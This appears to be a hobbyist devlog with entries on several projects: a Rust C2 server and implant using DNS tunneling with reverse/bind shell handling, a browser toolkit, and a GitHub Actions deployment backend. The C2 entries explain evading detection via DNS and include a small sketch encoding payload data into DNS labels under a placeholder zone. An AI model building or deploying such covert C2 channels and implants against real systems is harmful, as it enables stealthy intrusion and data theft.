Activity

anderson

Now I tried out whether writing the implant application in C or C++ would be viable, due to the difficulties of using UDP sockets in no_std Rust.

Attachment
0
anderson

Now I created a table for the DNS records in the database, created a configuration file, and merged everything. I also made a script that automatically runs cargo fmt.

Attachment
0
anderson

Redo, again.

So previously I used the dns-server crate for the DNS server, due to its simplicity (and efficiency). Sadly, it couldn’t meet my requirements and wasn’t reliable enough for me to approve. That was my mistake for not doing enough research. So I migrated to hickory-proto and a plain UDP socket. This might change in the future, because hickory-proto for some reason pulled in around 300KB of libraries that I frankly don’t need just for some parsing. Either way, I also removed the prototype DNS client from the implant, as I deemed it unethical and potentially insecure to keep code you don’t understand in your codebase, so I’ll rewrite that in the near future.
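For reference, the wire format the server now reads off the UDP socket is simple enough to sketch without any crates. hickory-proto does the real, compression-aware parsing; this std-only sketch just pulls the first query name (QNAME) out of a raw packet:

```rust
use std::net::UdpSocket;

/// Extract the first query name from a raw DNS packet. Queries don't
/// use name compression, so walking length-prefixed labels is enough.
fn parse_qname(packet: &[u8]) -> Option<String> {
    let mut pos = 12; // the fixed 12-byte DNS header comes first
    let mut labels: Vec<String> = Vec::new();
    loop {
        let len = *packet.get(pos)? as usize;
        if len == 0 {
            break; // a zero-length label terminates the name
        }
        pos += 1;
        let label = packet.get(pos..pos + len)?;
        labels.push(String::from_utf8_lossy(label).into_owned());
        pos += len;
    }
    Some(labels.join("."))
}

fn main() -> std::io::Result<()> {
    let socket = UdpSocket::bind("127.0.0.1:0")?;
    // Craft a query for example.com and loop it back to ourselves,
    // standing in for a resolver hitting the nameserver.
    let mut pkt = vec![0u8; 12];
    pkt.push(7);
    pkt.extend_from_slice(b"example");
    pkt.push(3);
    pkt.extend_from_slice(b"com");
    pkt.push(0);
    socket.send_to(&pkt, socket.local_addr()?)?;

    let mut buf = [0u8; 512]; // classic DNS messages fit in 512 bytes
    let (n, src) = socket.recv_from(&mut buf)?;
    println!("query from {src}: {:?}", parse_qname(&buf[..n]));
    Ok(())
}
```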

Other than that, I added a database and an encryption keypair. These will be used later, but at the moment they’re kinda useless.
Summary:

  • Rewrite DNS logic for server (again)
  • Work on the implant
  • Add encryption and database logic
Attachment
0
anderson

Full remake, start

Hello. I thought: why is C2 data usually transmitted over DNS? Turns out, detection and response systems usually don’t have filtering rules as strict for DNS traffic. You can also, in a way, “proxy” the information: more technically, the recursive DNS resolver forwards the query to your nameserver, which can return any potential information in its response.
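The idea can be sketched in a few lines: payload bytes become DNS labels under a zone you control, and any recursive resolver will carry them to your nameserver. The zone name and chunk size below are illustrative placeholders, not the project’s actual values:

```rust
/// RFC 1035 caps a label at 63 bytes; 30 raw bytes -> 60 hex chars
/// per label keeps us safely under that.
const CHUNK: usize = 30;

/// Hex-encode payload bytes and split them into DNS labels under a
/// zone whose authoritative nameserver you control (placeholder here).
fn encode_query(data: &[u8], zone: &str) -> String {
    let hex: String = data.iter().map(|b| format!("{b:02x}")).collect();
    let labels: Vec<&str> = hex
        .as_bytes()
        .chunks(CHUNK * 2)
        .map(|c| std::str::from_utf8(c).unwrap()) // hex is always ASCII
        .collect();
    format!("{}.{}", labels.join("."), zone)
}

fn main() {
    // A recursive resolver happily forwards this name to the zone's
    // nameserver, carrying the payload with it.
    let q = encode_query(b"hello", "c2.example.com");
    println!("{q}"); // prints 68656c6c6f.c2.example.com
}
```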

So I completely scrapped my previous attempt at the server (though the client might be reused) and started writing it for DNS instead. This time, I’ve also started writing the client/victim payload.

All programs are currently written in Rust for security, though the client uses unsafe Rust.

See https://github.com/a-rvid/tuxmux/tree/dns branch.

The plan is to use encryption to hide the data between clients and analysts.

Attachment
0
anderson

Optimization, commands

Temporarily disabled the client connection (you’ll be able to listen with the :l command and connect to bind shells with :b later). I optimized the Cargo.toml file for binary filesize. I added a notification and MOTD system (the MOTD being the “welcome message” displayed).
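For context, the usual Cargo.toml levers for shrinking a release binary look something like this; a sketch of the standard min-size profile, not necessarily the exact flags used here:

```toml
[profile.release]
opt-level = "z"   # optimize for size rather than speed
lto = true        # whole-program link-time optimization
codegen-units = 1 # better optimization at the cost of build time
panic = "abort"   # drop the unwinding machinery
strip = true      # strip symbols from the binary
```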

Attachment
0
anderson

So I had this idea one day that I would write a terminal multiplexer, such as tmux, because I’m too bad at using tmux (meaning I’m too lazy to change the bindings). So I started on a base, see these commits:

  • pty start implementation
  • base

They were fine and all. But you always want something more, so instead of writing a terminal multiplexer, I started on a reverse/bind shell handler, which you could call a C2 server. Today I created a server that listens for incoming connections on a specified port and connects to bind shells, plus a client using ratatui, and connected it all up with a UNIX socket.
Attachment
0
anderson

Shipped this project!

Hours: 28.42
Cookies: 🍪 96
Multiplier: 3.39 cookies/hr

This project turned out quite a bit larger than I thought, though I’m glad I had esse’s help (https://flavortown.hackclub.com/projects/15826), so that we could make something great together.

I’m really proud that I managed to build my own libraries based on WebAssembly/Rust, as I hadn’t dabbled with WASM at all before. It’s also pretty cool how well styled it is, and how swift the navigation feels. Styling is probably the most difficult thing for me, so I offloaded that to esse so I could focus on what I like most: low-level technical stuff.

anderson

We’ve done some final touches on the project, and it’s finally coming together pretty nicely. While it’s in a finished, usable state, there are tons more features to add in the future.

Attachment
0
anderson

Shipped this project!

Hours: 4.76
Cookies: 🍪 88
Multiplier: 18.42 cookies/hr

Publish Site v2: improved stability since the last release. Previously it was too unstable, with too much dynamic configuration to manage, which made it unreliable. But right now it’s almost as simple as GitHub Actions! Start a Docker container, run a script, open a port and BAM! Supercharge your workflows with this.

I had a hard time figuring out the proper solutions to my problems, but I did!

anderson

Publish Site workflow, version 2

Transitioning from version one to two, I’ve made major changes regarding security (confidentiality, integrity), availability, usability (ease of setup), stability and features.

PHP

I’ve added another Docker image dedicated to PHP, which adds PHP support seamlessly integrated into the container. It is very much optimized, as usual.

SSH?

Instead of using the previous HTTP backend, I’ve switched to SSH to improve stability, security and ease of use. SSH only requires one configuration point each for the backend and the client (GitHub Actions): a public key and a private key, generated seamlessly by my PKI script. The project is now as stable as it gets and really easy to configure! Time for you to publish a web application!

The old Rust backend will remain in a legacy, unstable state; do not use it!

Attachment
0
anderson

Exif Reader

I read EXIF data from user-uploaded files and put it in a table. It’s written in Rust and compiled to WASM. For some reason, strings enclosed in quotation marks aren’t being saved in the vector, so we’ll have to fix that.

Attachment
0
anderson

Image conversion, DNS Lookup utility

One thing I’ve always wanted in the tools is an image converter: PNG to AVIF, JPEG to WebP, etc.
Now it’s finally done, in a fairly simple and lightweight solution! I wrote it in Rust, in a separate WebAssembly file so it doesn’t slow things down for people who only use the hash digests. It’s about 1.3MB, which is a reasonable package size.
Most online converters use a backend that transcodes your files, which is bad for your privacy and requires server-side processing.
The few local online converters usually use imagemagick-wasm, but its binary size is about 14 MB, roughly 10x bigger than mine.

I also wrote a DNS Lookup utility using Quad9 DoH!
We are still working on styling.

Attachment
Attachment
0
anderson

Patches, styling and WebAssembly using rust

Phew, we have continued on styling the website.

Previously, hashing didn’t work for data over a certain size; to fix this and speed up hashing, I’ve rewritten it in Rust/WASM. This is working flawlessly, though I removed RIPEMD, SHA-224 and SHA-384 as I deemed them unnecessary.
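Since the real digests live in the Rust/WASM module, the size fix boils down to streaming input in chunks rather than loading one giant buffer. A std-only illustration, using DefaultHasher as a stand-in for the actual SHA-2 code (digest crates expose the same update/finalize pattern):

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::Hasher;

/// Feed the input in fixed-size chunks instead of one giant buffer.
/// Digest crates like sha2 follow the same update/finalize pattern,
/// which is what makes hashing independent of the input size.
fn hash_chunked(data: &[u8], chunk: usize) -> u64 {
    let mut h = DefaultHasher::new();
    for part in data.chunks(chunk) {
        h.write(part); // incremental update
    }
    h.finish()
}

fn main() {
    let data = vec![0xABu8; 1 << 20]; // 1 MiB of input
    // The chunk size must not change the result.
    assert_eq!(hash_chunked(&data, 64), hash_chunked(&data, 4096));
    println!("{:016x}", hash_chunked(&data, 4096));
}
```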

Attachment
Attachment
0
anderson

I’ve worked with these features today:

  • More hashes
  • Encoding and decoding

I’ve also contributed major improvements to the styling, but right now it’s borked, as we are moving to CSS grid to improve the document layout. I also created the toolbar, which took quite a long time. My coworker helped with styling and continued on the unit conversion system. This means that we have these features so far:
  • Archive conversion
  • Unit conversion
  • Currency conversion
  • QR Code Generator
  • Hash computing
  • Encoder/decoder
Attachment
Attachment
0
anderson

My coprogrammer and I started working on the project. I implemented a local archive converter that at the moment supports:

  • tarball
  • tarball gzip
  • zip

I also made a publishing workflow that minifies everything and publishes it to GitHub Pages. My coprogrammer created the initial UI and is working on a unit converter. This is supposed to be a general-purpose toolkit, without the advertisements and junk of the alternatives.
Attachment
0
anderson

Shipped this project!

Hours: 36.22
Cookies: 🍪 741
Multiplier: 20.46 cookies/hr

I built a stable deployment plugin/action for GitHub Actions.
The backend is written in Rust and has two Docker images, Alpine and Debian, for both x86_64 and ARM! I use mTLS for authentication, and I proxy the backend through NGINX for security.
The most difficult part for me was the NGINX/docker configuration.
If you still don’t understand what my project does, you can look at the graph above, or my demo, or heck, even the code! Thanks to my seamless docker image and PKI script anyone should be able to deploy it.

To all data nerds out there, the Docker image is only 13.3 MB! Wow.

I’m proud I barely used any AI in this project. Have fun!

anderson

Patches

  • I’ve fixed vulnerabilities mostly related to the backend and published a v1 release on the action.
  • I also continued writing some documentation and the demo.
  • Proper termination handling and an init system for the container.
  • Docker/NGINX configuration environment variable for body size limit
  • Security policies on repo

Features

  • Minimal alpine image instead of Debian. You can still find the Debian docker image at debian tag.

To-Do

  • Implement streaming body processing (DoS risk) [High]
  • Add optional features to the container through configuration, such as PHP [Low]
  • Replace .unwrap() with proper error handling [Mid]
  • Logging
  • Verification of server authenticity (confidentiality) [Mid]
Attachment
0
anderson

During this period of time, I’ve accomplished this:

  • Documentation system
  • Documentation
  • NGINX request limit (2000MB, not an env var yet!!)
  • Various NGINX configuration troubles. This took a while

Writing documentation is boring, but it has to be done. You can find it at https://publish-site.rvid.eu/

Attachment
Attachment
Attachment
0
anderson

We are almost done, and I’ve come far enough to confidently make a demo, with the API being on here.

  • As you can see on this workflow, it works perfectly fine and as intended.
  • It maintains confidentiality and security, BUT not integrity and non-repudiation yet… This is a huge problem with simple fixes!

I deployed this on my local server with docker compose:

services:
  deploy-server:
    environment:
      API_URL: api.publish-site.rvid.eu
      CLIENT_CA: >-
        [REDACTED]
    image: ghcr.io/publish-site/backend:latest
    ports:
      - '443:443'
    volumes:
      - /etc/certificates/pub.crt:/etc/nginx/ssl/fullchain.pem:ro
      - /etc/certificates/pub.key:/etc/nginx/ssl/privkey.pem:ro
      - /mnt/SSD/publish-site:/var/www/html # Persistence
Attachment
0
anderson

Phew… I’ve finally completed the difficult (but fun) part of the backend… Now I mostly have Docker/NGINX configuration up ahead, and of course the actual workflow. I’ve successfully converted to hyper, and I use the base64 crate instead of the hacky and unreliable previous solution.
Instead of this:

  • Create temporary directory
  • Write Base64 to file using coreutils and bash
  • Open decoded file
  • Decompress
  • Untar

We have:

  • Decode Base64, decompress, untar

in one go.

The API is in a working state, but at the moment insecure. I call the version: PRE-01-INSECURE

You feel so good when you’ve accomplished something on your own (:


Simple and seamless.

0
anderson

Cool! I’ve started rewriting the backend codebase to use the HTTP library hyper! This will eventually make the application more stable and secure, and it will probably be able to handle larger and more numerous requests. I also modified the Docker build workflow, so now we have a Docker container for all fellow ARM/Raspberry Pi lovers!

Attachment
Attachment
0
anderson

Ugh… Sometimes you just have bad luck when programming… I’ve been trying to fix one single line, line 73 of commit 34f7b4d832db0df3e47796c5543adbf6df62725c (https://github.com/publish-site/backend/blob/34f7b4d832db0df3e47796c5543adbf6df62725c/src/main.rs#L73), for an hour now. At this point, I plan on moving my backend to a lightweight web framework called hyper. I had planned on using as few dependencies and crates as possible, but using the hyper framework will likely make my program less susceptible to risks such as denial of service and RCE. I’ll need to rewrite the majority of the backend API, but it’ll be simpler.

Either way, I’ve still made some progress! I changed some entries in the Docker container and made the example site contain links to relevant documentation.

Attachment
0
anderson

YAHOO! I’ve finally completed the write part of the program, where it takes the site.tar.gz and decompresses the archive into a target directory! This means the project can technically be used at this point in time, though with no security/confidentiality at all. I also used the base64 command from GNU Coreutils, which should be temporary… I tried using the base64 crate but it was difficult. I also need to implement automatic removal of the files, but that’s pretty simple.

0
anderson

Hello! For the last few hours I’ve worked on getting colors into my program, YAY! Of course it checks whether the output is interactive, so potential Docker logs don’t risk getting cluttered with ANSI escapes. I also removed some annoying debugging output, so that’s good to have out of the way. I made the program print the user agent for logging purposes, and I may include more, like content length. I also started creating a wiki for both the backend and the action! This will make it easier for users to spin up their server and workflow.
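The interactivity check can be done with std alone since Rust 1.70 via the IsTerminal trait. A small sketch (function and message names are illustrative, not the project’s):

```rust
use std::io::IsTerminal;

/// Wrap `msg` in an ANSI color only when writing to a terminal,
/// so piped output and Docker logs stay plain.
fn colorize(msg: &str, is_tty: bool) -> String {
    if is_tty {
        format!("\x1b[32m{msg}\x1b[0m") // green
    } else {
        msg.to_string()
    }
}

fn main() {
    // IsTerminal (Rust 1.70+) reports whether stdout is interactive.
    let tty = std::io::stdout().is_terminal();
    println!("{}", colorize("server started", tty));
}
```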

NOTE: I don’t know why, but no time got logged with my neovim. Switching to Code OSS temporarily (?)

0
anderson

Phew! This was a long one. I finally implemented the upload logic for the backend server, meaning I can finally upload the actual files! There are a few rough edges in the Actions workflow, I still have a bunch of debugging lines in the backend, and it’s still not writing anything. Either way, I’m getting closer to done. I’m gonna focus on completion: first the upload part, then the authentication part, and after that I’ll clean up. Wish me luck!

1

Comments

anderson
anderson 3 months ago

Also, the server never actually completes the request yet (:

anderson

I continued working on the backend side of this project and made a Docker image of the server to be deployed. I implemented HTTPS by reverse-proxying through NGINX. The certs in the docker-compose file are intentionally left in the commit so you can check it out more easily. Next steps are to create the actual frontend to publish to, and to set up mTLS through NGINX. Should be easy enough.
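For reference, the NGINX side of this (HTTPS termination now, client-certificate verification for the mTLS step) can be sketched with the standard directives; the server name, paths and backend port below are placeholders:

```nginx
server {
    listen 443 ssl;
    server_name api.example.com;            # placeholder

    # Server certificate: terminates HTTPS in front of the backend
    ssl_certificate     /etc/nginx/ssl/fullchain.pem;
    ssl_certificate_key /etc/nginx/ssl/privkey.pem;

    # mTLS: only clients holding a cert signed by this CA get through
    ssl_client_certificate /etc/nginx/ssl/client-ca.pem;
    ssl_verify_client on;

    location / {
        proxy_pass http://127.0.0.1:8080;   # the Rust backend
    }
}
```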

Attachment
0
anderson

Today I worked on the base Actions workflow. So far, the workflow executes a script. I haven’t done any work on the “backend” yet. I also created an example workflow implementation.

Attachment
0